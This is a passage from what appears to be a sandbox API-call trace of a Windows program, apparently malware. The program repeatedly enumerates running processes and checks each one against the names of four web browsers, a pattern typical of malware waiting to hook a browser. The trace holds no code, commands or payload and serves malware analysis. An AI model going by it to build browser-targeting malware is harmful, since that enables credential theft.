lpString2="chrome.exe") returned 1 [0165.345] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.345] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0165.346] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0165.346] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0165.346] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0165.346] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0165.346] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0165.347] CloseHandle (hObject=0xd4) returned 1 [0165.347] Sleep (dwMilliseconds=0x3e8) [0166.448] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0166.450] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.450] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0166.450] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0166.451] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0166.451] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0166.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0166.451] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0166.451] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0166.451] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0166.451] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0166.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0166.452] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0166.452] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0166.452] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0166.452] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.452] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0166.452] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0166.452] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0166.452] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.453] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0166.453] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0166.453] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0166.453] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0166.453] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.453] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0166.454] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0166.454] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0166.454] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0166.454] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0166.454] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0166.454] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0166.454] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0166.454] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0166.455] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0166.455] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0166.455] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0166.455] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0166.455] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0166.455] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0166.455] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0166.456] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0166.456] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0166.456] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0166.456] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0166.456] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.457] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.458] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.458] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.458] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.458] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.458] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.459] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0166.460] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0166.460] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0166.460] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0166.460] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.461] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0166.462] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0166.462] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0166.462] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0166.462] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.462] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0166.463] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0166.463] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0166.463] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0166.463] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.463] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0166.463] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0166.463] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0166.463] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0166.463] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.463] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.464] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.464] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.464] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.464] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.464] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0166.464] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0166.465] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0166.465] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0166.465] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.465] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0166.465] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0166.465] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0166.465] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0166.465] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.465] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0166.466] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0166.466] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0166.466] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0166.466] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.466] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0166.466] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0166.466] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0166.466] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0166.466] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.466] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0166.467] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0166.467] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0166.467] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0166.467] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.467] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0166.468] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0166.468] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0166.468] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0166.468] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.468] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0166.468] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0166.468] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0166.468] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0166.468] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.468] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0166.469] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0166.469] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0166.469] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0166.469] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.469] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0166.469] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0166.469] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0166.470] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0166.470] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.470] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0166.470] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0166.470] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0166.470] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0166.470] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.470] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0166.471] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0166.471] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0166.471] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0166.471] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.471] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0166.471] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0166.471] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0166.471] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0166.471] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.471] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0166.472] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0166.472] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0166.472] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0166.472] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.472] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0166.473] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0166.473] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0166.473] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0166.473] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.473] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0166.473] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0166.473] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0166.473] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0166.473] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.473] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0166.474] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0166.474] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0166.474] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0166.474] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.474] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0166.474] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0166.474] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0166.474] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0166.474] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 